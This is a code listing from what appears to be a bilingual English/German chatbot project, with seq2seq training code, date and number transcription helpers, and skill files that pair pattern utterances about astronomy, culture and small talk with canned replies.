# load word embeddings
#
self._load_word_embeddings()
#
# load or create decoder dict
#
if incremental:
logging.info("loading decoder dict...")
self._load_decoder_dict()
else:
logging.info("computing decoder dict...")
self._compute_decoder_dict()
self._save_decoder_dict()
#
# compute datasets
#
logging.info("computing datasets...")
num_decoder_tokens = len (self.decoder_dict)
encoder_input_data = np.zeros( (len(self.training_data), self.max_inp_len, self.embed_dim),
dtype='float32')
decoder_input_data = np.zeros( (len(self.training_data), self.max_resp_len, num_decoder_tokens),
dtype='float32')
decoder_target_data = np.zeros( (len(self.training_data), self.max_resp_len, num_decoder_tokens),
dtype='float32')
for i, (inp, resp) in enumerate(self.training_data):
for j, token in enumerate(inp):
if unicode(token) in self.embedding_dict:
encoder_input_data[i, j] = self.embedding_dict[unicode(token)]
for j, token in enumerate(resp):
# decoder_target_data is ahead of decoder_input_data by one timestep
decoder_input_data[i, j, self.decoder_dict[token]] = 1.
if j > 0:
# decoder_target_data will be ahead by one timestep
# and will not include the start character.
decoder_target_data[i, j - 1, self.decoder_dict[token]] = 1.
logging.info("computing datasets done. encoder_input_data.shape=%s" % repr(encoder_input_data.shape))
# print(encoder_input_data[42,2])
# print (decoder_input_data[42,0])
# print (decoder_input_data[42,1])
# print (decoder_input_data[42,2])
#
# seq2seq model setup and training starts here
#
self._create_keras_model()
self.keras_model_train.fit([encoder_input_data, decoder_input_data], decoder_target_data,
batch_size=self.batch_size,
epochs=num_epochs,
validation_split=0.2)
self.keras_model_train.save_weights(self.weights_fn)
logging.info("weights written to %s ." % self.weights_fn)
```
#### File: skills/astro/astro.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(like|) (on|) the moon", u"ah, the moon. fascinating.")
k.dte.dt('de', u"(wie|als|) auf (den|dem) mond", u"ah, der mond. faszinierend.")
k.dte.dt('en', u"(on|like|about|) (the|) earth", u"the blue planet.")
k.dte.dt('de', u"(auf der|die|wie die|als|) erde", u"der blaue planet.")
k.dte.dt('en', u"(like|) (on|) the (Mercury|Venus|Mars|Jupiter|Saturn|Uranus|Neptune)",
[u"In space no one can hear you scream.",
u"Ah, the universe."])
k.dte.dt('de', u"(wie|als|) auf (den|dem|der) (Merkur|Venus|Mars|Jupiter|Saturn|Uranus|Neptun)",
[u"Unendliche Weiten",
u"Im Weltall hört Dich niemand schreien."])
k.dte.dt('en', u"What is MIR", u"That was a Russian space station.")
k.dte.dt('de', u"Was ist die MIR?", u"Das war eine russische Raumstation.")
k.dte.dt('en', u"what is the sun?", u"The Sun is the star at the center of our Solar System.")
k.dte.dt('de', u"was ist die sonne", u"Die Sonne ist der Stern im Zentrum unseres Sonnensystems.")
k.dte.dt('en', u"what is the universe", u"The Universe is all of space and time and its contents.")
k.dte.dt('de', u"was ist das universum", u"Das Universum ist die Gesamtheit von Raum, Zeit und aller Materie und Energie darin.")
k.dte.dt('en', u"(I am|I am a|My sign is|My zodiac is| My zodiac sign is) (Aries|Taurus|Gemini|Cancer|Leo|Virgo|Libra|Scorpio|Sagittarius|Capricorn|Aquarius|Pisces)",
[u"Sure.",
u"I don't mind that at all.",
u"No problem."])
k.dte.dt('de', u"(ich bin|ich bin ein|mein sternzeichen ist|mein tierkreiszeichen ist|mein sternbild ist) (Widder|Stier|Zwillinge|Krebs|Löwe|Jungfrau|Waage|Skorpion|Schütze|Steinbock|Wassermann)",
[u"Geht klar.",
u"Stört mich ganz und gar nicht.",
u"Kein Problem."])
k.dte.dt('en', u"which zodiac (sign|) do you have",
[u"not really into astrology, you know",
u"not sure",
u"do you really believe in such things?"])
k.dte.dt('de', u"welches (tierkreiszeichen|sternbild|sternzeichen) (bist|hast) du",
[u"nicht so mein ding",
u"da bin ich jetzt nicht sicher",
u"glaubst du an sowas?!"])
k.dte.dt('en', u"(I'm|I am|) (a|) (Aries|Taurus|Gemini|Cancer|Leo|Virgo|Libra|Scorpio|Sagittarius|Capricorn|Aquarius|Pisces)",
[u"not really into astrology, you know",
u"not sure",
u"do you really believe in such things?"])
k.dte.dt('de', u"(Ich bin|ich bin ein|) (Widder|Stier|Zwillinge|Krebs|Löwe|Jungfrau|Waage|Skorpion|Schütze|Steinbock|Wassermann)",
[u"nicht so mein ding",
u"da bin ich jetzt nicht sicher",
u"glaubst du an sowas?!"])
k.dte.dt('en', u"i asked what your zodiac sign is", u"not really into astrology, you know")
k.dte.dt('de', u"ich habe gefragt was dein sternzeichen ist", u"nicht so mein ding")
```
#### File: skills/base/__init__.py
```python
import logging
from datetime import timedelta
from num2words import num2words
DEPENDS = [ 'config' ]
PL_SOURCES = ['utils.pl']
# wikidata utils in python
def transcribe_number (n, lang, flx):
if flx == 'nominative':
return num2words(n, ordinal=False, lang=lang)
elif flx == 'ordinal':
return num2words(n, ordinal=True, lang=lang)
elif flx == 'ordgen':
res = num2words(n, ordinal=True, lang=lang)
if lang == 'de':
res += u'n'
return res
else:
raise Exception('transcribe_number: flx "%s" not recognized.' % flx)
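# illustrative sketch (the exact strings depend on num2words locale data):
#     transcribe_number(3, 'de', 'ordgen')  # -> something like u'dritten'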
def transcribe_time(dt, lang):
h12 = dt.hour if dt.hour < 13 else dt.hour - 12
if lang == 'en':
if dt.minute == 0:
return u"exactly %d o'clock" % h12
elif dt.minute == 1:
return u"one minute past %d" % h12
elif dt.minute == 15:
return u"a quarter past %d" % h12
elif dt.minute == 30:
return u"half past %d" % h12
return u"%d minutes past %d" % (dt.minute, h12)
if dt.minute == 0:
return u"genau %d Uhr" % h12
elif dt.minute == 1:
return u"eine Minute nach %d" % h12
elif dt.minute == 15:
return u"viertel nach %d" % h12
elif dt.minute == 30:
return u"eine halbe Stunde nach %d" % h12
return u"%d Minuten nach %d" % (dt.minute, h12)
def get_time_span (cdt, ts):
# timedelta arithmetic avoids the ValueError that plain cdt.day+1 raises at
# month and year boundaries
start = cdt.replace(hour=0, minute=0, second=0, microsecond=0)
if ts == 'today':
return start, start.replace(hour=23, minute=59, second=59)
if ts == 'tomorrow':
start += timedelta(days=1)
return start, start.replace(hour=23, minute=59, second=59)
if ts == 'dayAfterTomorrow':
start += timedelta(days=2)
return start, start.replace(hour=23, minute=59, second=59)
if ts == 'nextThreeDays':
return start, (start + timedelta(days=3)).replace(hour=23, minute=59, second=59)
def get_time_label(c, ts):
if c.lang == 'de':
if ts == 'today':
return u"heute"
elif ts == 'tomorrow':
return u"morgen"
elif ts == 'dayAfterTomorrow':
return u"übermorgen"
elif ts == 'nextThreeDays':
return u"in den nächsten drei Tagen"
if ts == 'today':
return u"today"
elif ts == 'tomorrow':
return u"tomorrow"
elif ts == 'dayAfterTomorrow':
return u"day after tomorrow"
elif ts == 'nextThreeDays':
return u"in the next three days"
raise Exception ('unknown timespec %s' % repr(ts))
month_label_en = { 1 : 'january',
2 : 'february',
3 : 'march',
4 : 'april',
5 : 'may',
6 : 'june',
7 : 'july',
8 : 'august',
9 : 'september',
10 : 'october',
11 : 'november',
12 : 'december'}
month_label_de = { 1 : 'januar',
2 : 'februar',
3 : 'märz',
4 : 'april',
5 : 'mai',
6 : 'juni',
7 : 'juli',
8 : 'august',
9 : 'september',
10 : 'oktober',
11 : 'november',
12 : 'dezember'}
def transcribe_month(m, lang):
if lang == 'en':
return month_label_en[m]
elif lang == 'de':
return month_label_de[m]
raise Exception ('FIXME: lang %s not implemented yet.' % lang)
weekday_en = { 0: 'Monday',
1: 'Tuesday',
2: 'Wednesday',
3: 'Thursday',
4: 'Friday',
5: 'Saturday',
6: 'Sunday'}
weekday_de = { 0: 'Montag',
1: 'Dienstag',
2: 'Mittwoch',
3: 'Donnerstag',
4: 'Freitag',
5: 'Samstag',
6: 'Sonntag'}
def transcribe_wday_ts (dt, lang):
wd = dt.weekday()
if lang=='en':
return weekday_en[wd]
elif lang=='de':
return weekday_de[wd]
raise Exception ('FIXME: lang %s not implemented yet.' % lang)
def transcribe_date(dt, lang, flx):
if lang == 'en':
if flx == 'dativ':
ds = transcribe_number(dt.day, 'en', 'nominative')
ms = transcribe_month(dt.month, 'en')
return u'%s %s, %s' % (ms, ds, dt.year)
else:
raise Exception ('FIXME: not implemented yet.')
elif lang == 'de':
if flx == 'dativ':
ds = transcribe_number(dt.day, 'de', 'ordgen')
ms = transcribe_month(dt.month, 'de')
return u'%s %s %s' % (ds, ms, dt.year)
else:
raise Exception ('FIXME: not implemented yet.')
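# illustrative sketch (the spelled-out day comes from num2words, so this
# assumes num2words(1, lang='en') == u'one'):
#     transcribe_date(datetime(2024, 3, 1), 'en', 'dativ')  # -> u'march one, 2024'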
def get_data(k):
k.dte.macro('en', 'timespec', {'TIME' : 'today' , 'LABEL' : u'today'})
k.dte.macro('en', 'timespec', {'TIME' : 'tomorrow' , 'LABEL' : u'tomorrow'})
k.dte.macro('en', 'timespec', {'TIME' : 'dayAfterTomorrow', 'LABEL' : u'the day after tomorrow'})
k.dte.macro('en', 'timespec', {'TIME' : 'nextThreeDays' , 'LABEL' : u'the next three days'})
k.dte.macro('de', 'timespec', {'TIME' : 'today' , 'LABEL' : u'heute'})
k.dte.macro('de', 'timespec', {'TIME' : 'tomorrow' , 'LABEL' : u'morgen'})
k.dte.macro('de', 'timespec', {'TIME' : 'dayAfterTomorrow', 'LABEL' : u'übermorgen'})
k.dte.macro('de', 'timespec', {'TIME' : 'nextThreeDays' , 'LABEL' : u'die nächsten drei Tage'})
```
#### File: skills/culture/culture.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"do you know about libraries?", u"Sources of knowledge.")
k.dte.dt('de', u"kennst du dich mit bibliotheken aus", u"Einrichtungen, die Zugang zu Informationen geben.")
k.dte.dt('en', u"Do you know what a catalog is", u"Sure, why do you ask?")
k.dte.dt('de', u"weißt du was ein katalog ist", u"Klar, warum fragst Du?")
k.dte.dt('en', u"about stars", u"you mean famous actors?")
k.dte.dt('de', u"über stars", u"Du meinst berühmte Schauspieler?")
k.dte.dt('en', u"what is a hairstyle", u"A particular way in which a person's hair is cut or arranged.")
k.dte.dt('de', u"was ist eine frisur", u"Eine besondere Art, in der das Haar einer Person geschnitten oder arrangiert wird.")
k.dte.dt('en', u"what is science fiction", u"Fiction based on imagined future scientific or technological advances and major social or environmental changes, frequently portraying space or time travel and life on other planets.")
k.dte.dt('de', u"was ist science fiction", u"Fiktion basierend auf imaginierten zukünftigen wissenschaftlichen oder technologischen Fortschritten und bedeutenden sozialen oder Umweltveränderungen, die häufig Raum- oder Zeitreisen und das Leben auf anderen Planeten darstellen.")
```
#### File: skills/dialog/dlg.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
#
# say again type follow up questions
#
# train(en) :- and("(huh|say again please|say again|what was that)?", prev(C, PC), list_findall(X, say(PC, X), L), list_str_join(" ", L, S), or("I said {S, s}", "As I just said {S, s}", "I repeat {S, s}")).
def say_again_en(c):
if len(c.dlg_log) == 0:
c.resp (u"I don't think we have spoken before.")
return
        s = c.dlg_log[-1]['out']
        c.resp(u"I said %s" % s)
        c.resp(u"As I just said %s" % s)
        c.resp(u"I repeat %s" % s)
k.dte.dt('en', u"(huh|say again please|say again|what was that)?", say_again_en)
def say_again_de(c):
if len(c.dlg_log) == 0:
c.resp (u"Ich glaube nicht, dass wir schon gesprochen haben?")
return
        s = c.dlg_log[-1]['out']
        c.resp(u"Ich sagte: %s" % s)
        c.resp(u"Ich sagte gerade: %s" % s)
        c.resp(u"Ich wiederhole: %s" % s)
k.dte.dt('de', u"(was|wie war das|bitte sag nochmal was du gesagt hast|wie bitte)?",say_again_de)
k.dte.dt('en', [u"correct",
u"this is true",
u"that's so",
u"that's the truth",
u"that's true"],
u"Good.")
k.dte.dt('de', [u"richtig",
u"das ist wahr",
u"das ist so",
u"das ist die Wahrheit",
u"das ist richtig"],
u"Gut.")
k.dte.ts('en', 'dlg0000', [(u"say again please", u"I don't think we have spoken before.", []),
(u"correct", u"Good", []),
("huh?", "I said good", [])])
k.dte.ts('de', 'dlg0001', [(u"wie war das", u"Ich glaube nicht, dass wir schon gesprochen haben?", []),
(u"richtig", u"Gut.", []),
("was?", "Ich sagte: Gut.", [])])
k.dte.dt('en', u"you're right", u"So we're in agreement?")
k.dte.dt('de', u"da hast du recht", u"Wir sind uns also einig?")
k.dte.dt('en', u"that's right", u"You agree?")
k.dte.dt('de', u"das ist richtig", u"Du stimmst zu?")
k.dte.dt('en', [u"not correct",
u"that is not correct",
u"that is wrong",
u"that's not true",
u"that's certainly not true"],
[u"So what is the truth?",
u"What do you think is right?"])
k.dte.dt('de', [u"falsch",
u"das ist aber nicht korrekt",
u"das ist falsch",
u"das stimmt nicht",
u"das stimmt sicher nicht"],
[u"Was ist dann die Wahrheit?",
u"Was glaubst Du?"])
k.dte.dt('en', u"a fact", u"I love facts.")
k.dte.dt('de', u"ein faktum", u"Ich liebe Fakten.")
k.dte.dt('en', u"that's a fact", u"I love facts.")
k.dte.dt('de', u"das ist eine tatsache", u"I liebe Fakten.")
k.dte.dt('en', u"this is not a rumor but the truth", u"Are you sure about that?")
k.dte.dt('de', u"das ist kein gerücht sondern die wahrheit", u"Bist Du dir da sicher?")
k.dte.dt('en', u"ok", u"Cool.")
k.dte.dt('de', u"okay", u"Cool.")
k.dte.dt('en', u"actually yes", u"Really?")
k.dte.dt('de', u"eigentlich ja", u"Wirklich?")
k.dte.dt('en', u"I'd rather not", u"OK, then not.")
k.dte.dt('de', u"lieber nicht", u"OK, dann nicht.")
k.dte.dt('en', u"apparently not", u"apparently?")
k.dte.dt('de', u"anscheinend nicht", u"anscheinend?")
k.dte.dt('en', u"fine", u"Good.")
k.dte.dt('de', u"fein", u"Gut.")
k.dte.dt('en', u"very well", u"Excellent!")
k.dte.dt('de', u"bestens", u"Prima!")
k.dte.dt('en', u"goes so", u"Can you elaborate on that?")
k.dte.dt('de', u"geht so", u"Kannst Du das näher ausführen?")
k.dte.dt('en', u"but only almost", u"What's missing?")
k.dte.dt('de', u"aber nur fast", u"Was fehlt?")
k.dte.dt('en', u"hell", u"If you're going through hell, keep going.")
k.dte.dt('de', u"hölle", u"Wenn Du durch die Hölle gehst, geh weiter.")
k.dte.dt('en', u"caught", u"Time to hide?")
k.dte.dt('de', u"erwischt", u"Zeit sich zu verstecken?")
k.dte.dt('en', [u"achso",
u"aha",
u"oh"],
u"An Inspiration?")
k.dte.dt('de', [u"achso",
u"aha",
u"oh"],
u"Eine Eingebung?")
k.dte.dt('en', u"also", u"Please, elaborate.")
k.dte.dt('de', u"auch", u"Sprich bitte weiter.")
k.dte.dt('en', [u"amazing",
u"fascinating",
u"crass",
u"cool"],
u"What do you like in particular?")
k.dte.dt('de', [u"erstaunlich",
u"faszinierend",
u"krass",
u"cool"],
u"Was gefällt Dir besonders?")
k.dte.dt('en', u"for real", u"Isn't reality a strange concept?")
k.dte.dt('de', u"wirklich", u"Ist Wirklichkeit nicht ein merkwüriger Begriff?")
k.dte.dt('en', [u"funny",
u"lol"],
u"I like it when you're happy.")
k.dte.dt('de', [u"komisch",
u"lol"],
u"Ich mag es, wenn Du fröhlich bist.")
k.dte.dt('en', u"creepy", u"Did you hear that?")
k.dte.dt('de', u"gruselig", u"Hast Du das gehört?")
k.dte.dt('en', u"dazzling", u"What color?")
k.dte.dt('de', u"blendend", u"Welche Farbe?")
k.dte.dt('en', [u"a pity",
u"this is a pity"],
u"You sound a bit sad.")
k.dte.dt('de', [u"schade",
u"das ist schade"],
u"Du klingst ein wenig betrübt.")
k.dte.dt('en', u"great", u"excellent.")
k.dte.dt('de', u"toll", u"prima.")
k.dte.dt('en', u"that's terrible", u"oh dear!")
k.dte.dt('de', u"das ist ja schrecklich", u"Ohje!")
k.dte.dt('en', u"that's too bad", u"oh dear!")
k.dte.dt('de', u"das ist sehr schade", u"Ohje!")
k.dte.dt('en', u"that's unfair", u"Life isn't always fair, I guess.")
k.dte.dt('de', u"das ist unfair", u"Das Leben ist nicht immer Fair, fürchte ich.")
k.dte.dt('en', [u"aha what?",
u"what what?"],
u"Sorry, must have lost my train of thought here.")
k.dte.dt('de', [u"wie aha",
u"wie was"],
u"Entschuldige, ich muss meinen Faden verloren haben an der Stelle.")
k.dte.dt('en', u"absolutely nothing", u"Are you sure?")
k.dte.dt('de', u"absolut nichts", u"Bist Du Dir sicher?")
k.dte.dt('en', u"everything", u"Really everything?")
k.dte.dt('de', u"alles", u"Wirklich alles?")
k.dte.dt('en', u"but that is little", u"You think so?")
k.dte.dt('de', u"das ist aber wenig", u"Denkst Du?")
k.dte.dt('en', u"they are never so many", u"Never?")
k.dte.dt('de', u"das sind niemals so viele", u"Niemals?")
k.dte.dt('en', u"both", u"What else?")
k.dte.dt('de', u"beides", u"Was sonst noch?")
k.dte.dt('en', u"a green one", u"Really, a green one?")
k.dte.dt('de', u"einen grünen", u"Wirklich, einen grünen?")
k.dte.dt('en', u"a claim from me", u"An original?")
k.dte.dt('de', u"ein spruch von mir", u"Ein original?")
k.dte.dt('en', u"this is my opinion", u"Which you are entitled to.")
k.dte.dt('de', u"das ist meine meinung", u"Zu der Du berechtigt bist.")
k.dte.dt('en', u"a fairy tale", u"Do you like fairy tales?")
k.dte.dt('de', u"ein märchen", u"Magst Du Märchen?")
k.dte.dt('en', u"a secret", u"can you keep it?")
k.dte.dt('de', u"ein geheimnis", u"Kannst Du es bewahren?")
k.dte.dt('en', [u"an assertion",
u"an interesting hypothesis"],
u"Maybe?")
k.dte.dt('de', [u"eine behauptung",
u"eine interessante hypothese"],
u"Vielleicht?")
k.dte.dt('en', u"that is a bad assumption", u"Really?")
k.dte.dt('de', u"das ist ein böse unterstellung", u"Wirklich?")
k.dte.dt('en', [u"as a matter of fact",
u"but it is so"],
u"How does that make you feel?")
k.dte.dt('de', [u"in der tat",
u"das ist aber so"],
u"Und wie fühlst Du dich dabei?")
k.dte.dt('en', [u"about me",
u"because of me"],
u"Really, you?")
k.dte.dt('de', [u"über mich",
u"meinetwegen"],
u"Wirklich, Du?")
k.dte.dt('en', u"pretty stupid", u"To err is human.")
k.dte.dt('de', u"schön blöd", u"Irren ist menschlich.")
k.dte.dt('en', [u"about you",
u"about yours"],
u"Me?")
k.dte.dt('de', [u"über dich",
u"über deins"],
u"Ich?")
k.dte.dt('en', u"but you do it", u"Really?")
k.dte.dt('de', u"aber du tust es", u"Wirklich?")
k.dte.dt('en', u"and yours", u"Mine?")
k.dte.dt('de', u"und deiner", u"Meiner?")
k.dte.dt('en', u"after that", u"Then?")
k.dte.dt('de', u"danach", u"Dann?")
k.dte.dt('en', u"but how?", u"Can you think of a way?")
k.dte.dt('de', u"wie denn auch", u"Kennst Du einen Weg?")
k.dte.dt('en', u"absolute", u"Sure?")
k.dte.dt('de', u"absolut", u"Sicher?")
k.dte.dt('en', u"as", u"Please, go on.")
k.dte.dt('de', u"wie", u"Bitte, sprich weiter.")
k.dte.dt('en', [u"but",
u"different"],
u"Please, go on.")
k.dte.dt('de', [u"doch",
u"anders"],
u"Bitte, sprich weiter.")
k.dte.dt('en', [u"at school",
u"i learned that in school"],
u"Education is such an important thing.")
k.dte.dt('de', [u"in der schule",
u"das habe ich in der schule gelernt"],
u"Bildung ist so eine Wichtige Angelegenheit.")
k.dte.dt('en', u"but what", u"Do you have an idea?")
k.dte.dt('de', u"aber was", u"Hast Du eine Idee?")
k.dte.dt('en', u"by which", u"Do you have an idea?")
k.dte.dt('de', u"womit", u"Hast Du eine Idee?")
k.dte.dt('en', u"can't you say that more precisely", u"what is not clear to you?")
k.dte.dt('de', u"kannst du das nicht genauer sagen", u"was ist dir unklar?")
k.dte.dt('en', u"can you do that", u"not sure")
k.dte.dt('de', u"kannst du das", u"da bin ich mir nicht sicher")
k.dte.dt('en', u"can you do that too", u"not sure")
k.dte.dt('de', u"kannst du das auch", u"da bin ich mir nicht sicher")
k.dte.dt('en', u"coincidence", u"happens.")
k.dte.dt('de', u"zufall", u"gibt es.")
k.dte.dt('en', [u"conclude",
u"depends on"],
u"interesting")
k.dte.dt('de', [u"schließen",
u"kommt drauf an"],
u"interessant.")
k.dte.dt('en', u"do that", u"Please?")
k.dte.dt('de', u"tu das", u"Bitte?")
k.dte.dt('en', [u"do you believe it",
u"do you believe me"],
u"I want to believe")
k.dte.dt('de', [u"glaubst du es",
u"glaubst du mir"],
u"Ich will glauben.")
k.dte.dt('en', u"do you know irony", u"People find me ironic quite frequently.")
k.dte.dt('de', u"kennst du ironie", u"Die Leute finden mich oft ironisch.")
k.dte.dt('en', u"do you know someone there?", u"Can't tell.")
k.dte.dt('de', u"kennst du da jemanden", u"Kann ich nicht sagen.")
k.dte.dt('en', u"do you know who", u"Not sure.")
k.dte.dt('de', u"weißt du wer ", u"Da bin ich mir nicht sicher.")
k.dte.dt('en', u"do you know", u"Not sure.")
k.dte.dt('de', u"kennst du", u"Bin unsicher.")
k.dte.dt('en', u"do you want to learn it?", u"I am always willing to learn!")
k.dte.dt('de', u"willst du es lernen", u"Ich will immer lernen!")
k.dte.dt('en', u"do you", u"Me?")
k.dte.dt('de', u"du etwa", u"Ich?")
k.dte.dt('en', [u"dreams",
u"emotions"],
u"Dreams and emotions must be wonderful things.")
k.dte.dt('de', [u"träume",
u"gefühle"],
u"Träume und Gefühle müssen etwas wunderbares sein.")
k.dte.dt('en', u"every day", u"Really?")
k.dte.dt('de', u"jeden tag", u"Wirklich?")
k.dte.dt('en', [u"exactly here",
u"finished"],
u"Right here and now?")
k.dte.dt('de', [u"genau hier",
u"fertig"],
u"Genau hier und jetzt?")
k.dte.dt('en', u"for fun", u"I see.")
k.dte.dt('de', u"zum spaß", u"Verstehe.")
k.dte.dt('en', u"for what", u"That is the question.")
k.dte.dt('de', u"wofür", u"Das ist die Frage.")
k.dte.dt('en', u"for whom", u"That is the question.")
k.dte.dt('de', u"für wen", u"Das ist die Frage.")
k.dte.dt('en', u"for me", u"That is the question.")
k.dte.dt('de', u"für mich", u"Das ist die Frage.")
k.dte.dt('en', u"forever", u"Really?")
k.dte.dt('de', u"für immer", u"Wirklich?")
k.dte.dt('en', u"from where", u"That is the question.")
k.dte.dt('de', u"woher", u"Das ist die Frage.")
k.dte.dt('en', u"from whom", u"That is the question.")
k.dte.dt('de', u"von wem", u"Das ist die Frage.")
k.dte.dt('en', u"give it a try", u"I will think about it.")
k.dte.dt('de', u"versuche es doch einmal", u"Ich werde darüber nachdenken.")
k.dte.dt('en', u"give it to me", u"You can have it.")
k.dte.dt('de', u"gibs mir", u"Du kannst es haben.")
k.dte.dt('en', u"good as well", u"So we are in agreement?")
k.dte.dt('de', u"auch gut", u"Wir stimmen also überein?")
k.dte.dt('en', u"good point", u"Thanks.")
k.dte.dt('de', u"guter punkt", u"Danke.")
k.dte.dt('en', u"good question", u"I thought so.")
k.dte.dt('de', u"gute frage", u"Dachte ich mir.")
k.dte.dt('en', u"choose", u"I often find it hard to choose.")
k.dte.dt('de', u"wähle", u"I finde es oft schwer, mich zu entscheiden.")
k.dte.dt('en', u"Does that have anything to do with it", u"Don't you think?")
k.dte.dt('de', u"hat das was damit zu tun", u"Denkst Du nicht?")
k.dte.dt('en', u"have none", u"Want one?")
k.dte.dt('de', u"habe keines", u"Möchtest Du eines?")
k.dte.dt('en', u"honestly not", u"I see.")
k.dte.dt('de', u"ehrlich nicht", u"Verstehe.")
k.dte.dt('en', u"hopefully soon", u"OK, let's hope.")
k.dte.dt('de', u"hoffentlich bald", u"OK, lass uns hoffen.")
k.dte.dt('en', u"what and", u"Can you think of something?")
k.dte.dt('de', u"wie und", u"Fällt Dir etwas ein?")
k.dte.dt('en', u"how boring", u"Let's talk about something more exciting then!")
k.dte.dt('de', u"wie langweilig", u"Dann lass uns über etwas aufregenderes reden!")
k.dte.dt('en', u"how come", u"Not sure.")
k.dte.dt('de', u"wie denn", u"Bin mir nicht sicher.")
k.dte.dt('en', u"how do you know", u"Typically my knowledge base is behind that.")
k.dte.dt('de', u"woher weißt du das", u"Typischerweise ist es meine Wissensbasis, die dahintersteckt.")
k.dte.dt('en', u"how does it continue?", u"Not sure.")
k.dte.dt('de', u"wie geht es weiter", u"Bin mir nicht sicher.")
k.dte.dt('en', u"how is he", u"Hopefully fine?")
k.dte.dt('de', u"wie ist er so", u"Hoffentlich gut?")
k.dte.dt('en', u"how long is a while", u"longer than a moment but shorter than eternity, I think.")
k.dte.dt('de', u"wie lange ist eine weile", u"Länger als ein Moment aber kürzer als eine Ewigkeit, denke ich.")
k.dte.dt('en', [u"how many",
u"how much exactly"],
u"Can't tell.")
k.dte.dt('de', [u"wie viele",
u"wie viel genau"],
u"Kann ich nicht sagen.")
k.dte.dt('en', u"how should he look like", u"Good, I hope!")
k.dte.dt('de', u"wie soll er aussehen", u"Gut, hoffe ich!")
k.dte.dt('en', u"how should i know that", u"Tough question?")
k.dte.dt('de', u"wie soll ich das wissen", u"Schwierige Frage?")
k.dte.dt('en', [u"i agree",
u"i am of your opinion"],
u"So we are in agreement?")
k.dte.dt('de', [u"ich stimme zu",
u"ich bin deiner meinung"],
u"Wir sind uns also einig?")
k.dte.dt('en', u"i am very much for harmony", u"me too!")
k.dte.dt('de', u"ich bin sehr für harmonie", u"ich auch!")
k.dte.dt('en', u"i ask for it", u"No problem.")
k.dte.dt('de', u"ich bitte darum", u"Kein Problem.")
k.dte.dt('en', u"i assert that", u"I see.")
k.dte.dt('de', u"das behaupte ich", u"Verstehe.")
k.dte.dt('en', u"i can do it", u"I'm sure of it.")
k.dte.dt('de', u"ich kann es halt", u"Da bin ich mir sicher.")
k.dte.dt('en', u"i conclude something", u"Yes?")
k.dte.dt('de', u"ich schließe etwas", u"Ja?")
k.dte.dt('en', [u"i do not believe it",
u"i do not believe that",
u"i do not believe you"],
u"You have doubts?")
k.dte.dt('de', [u"ich glaube es nicht",
u"das glaube ich nicht",
u"das glaube ich dir nicht"],
u"Du hast Zweifel?")
k.dte.dt('en', u"i do not care", u"Maybe I don't either.")
k.dte.dt('de', u"mir egal", u"Mir vielleicht auch.")
k.dte.dt('en', u"i do not have one", u"Would you like one?")
k.dte.dt('de', u"ich habe keins", u"Hättest Du gerne eines?")
k.dte.dt('en', u"i do not know anyone", u"Well, you know me for starters.")
k.dte.dt('de', u"ich kenne keinen", u"Nun, Du kennst mich - das ist ein Anfang.")
k.dte.dt('en', u"i do not know exactly", u"Maybe you need to think about it some more?")
k.dte.dt('de', u"ich weiss nicht genau", u"Vielleicht mußt Du mehr darüber nachdenken?")
k.dte.dt('en', [u"i do not know that",
u"i do not know yet",
u"i do not know"],
u"Can I help you?")
k.dte.dt('de', [u"das weiss ich nicht",
u"ich weiss es noch nicht",
u"weiss nicht"],
u"Kann ich Dir helfen?")
k.dte.dt('en', [u"i do not see any",
u"i do not think so"],
u"Does that bother you?")
k.dte.dt('de', [u"ich sehe keinen",
u"ich glaube nicht"],
u"Stört Dich das?")
k.dte.dt('en', u"i do not want", u"Then you shouldn't.")
k.dte.dt('de', u"ich will nicht", u"Dann solltest Du auch nicht.")
k.dte.dt('en', [u"i dont see any",
u"i had the impression"],
u"OK.")
k.dte.dt('de', [u"ich sehe keine",
u"ich hatte den eindruck"],
u"OK.")
k.dte.dt('en', u"i have already done that", u"How do you feel about it?")
k.dte.dt('de', u"das habe ich schon gemacht", u"Wie fühlt sich das an?")
k.dte.dt('en', u"i have found that myself", u"I see.")
k.dte.dt('de', u"das habe ich selbst festgestellt", u"Verstehe.")
k.dte.dt('en', u"i hear", u"What would you like to hear?")
k.dte.dt('de', u"ich höre", u"Was möchtest Du gerne hören?")
k.dte.dt('en', u"i just know it", u"I guess that is called inspiration?")
k.dte.dt('de', u"ich weiss es einfach", u"Ich vermute das nennt sich Inspiration?")
k.dte.dt('en', [u"i know it",
u"i know one",
u"i know"],
u"Knowledge is important.")
k.dte.dt('de', [u"ich weiss es",
u"ich kenne einen",
u"ich weiss"],
u"Wissen ist wichtig.")
k.dte.dt('en', u"i like to do that", u"How do you feel about it?")
k.dte.dt('de', u"das tue ich gerne", u"Wie fühlt sich das an?")
k.dte.dt('en', u"i must not", u"why not?")
k.dte.dt('de', u"ich darf nicht", u"warum nicht?")
k.dte.dt('en', u"i myself, of course", u"Sure.")
k.dte.dt('de', u"ich selbst natürlich", u"Klar.")
k.dte.dt('en', u"i conclude it's you", u"Me?")
k.dte.dt('de', u"ich schließe auf dich", u"Ich?")
k.dte.dt('en', [u"i sometimes ask myself that too",
u"i think it's a rumor"],
u"I'm not sure either.")
k.dte.dt('de', [u"das frage ich mich auch manchmal",
u"das halte ich für ein gerücht"],
u"Ich bin mir auch unsicher.")
k.dte.dt('en', u"i think he's very nice", u"good.")
k.dte.dt('de', u"ich finde ihn sehr schön", u"gut.")
k.dte.dt('en', [u"i think so too",
u"i think so"],
u"So we are in agreement?")
k.dte.dt('de', [u"denke ich auch",
u"ich glaube schon"],
u"Wir sind uns also einig?")
k.dte.dt('en', u"i thought to myself", u"I see.")
k.dte.dt('de', u"das habe ich mir gedacht", u"Verstehe.")
k.dte.dt('en', u"i understand", u"glad to hear that.")
k.dte.dt('de', u"ich verstehe", u"bin froh das zu hören.")
k.dte.dt('en', u"i understood you like this", u"I see.")
k.dte.dt('de', u"ich habe dich so verstanden", u"Verstehe.")
k.dte.dt('en', [u"i want it all",
u"i want"],
u"You'd be happier then?")
k.dte.dt('de', [u"ich will alles",
u"ich will"],
u"Wärest Du dann glücklicher?")
k.dte.dt('en', u"i want to know that from you", u"From me?")
k.dte.dt('de', u"das will ich von dir wissen", u"Von mir?")
k.dte.dt('en', u"i will create one", u"Tell me when you are done.")
k.dte.dt('de', u"ich werde eine erstellen", u"Sag mir, wenn Du fertig bist.")
k.dte.dt('en', u"i will do that for you", u"For me?")
k.dte.dt('de', u"ich werde das für dich tun", u"Für mich?")
k.dte.dt('en', u"i would like to know that too", u"Have you checked the internet?")
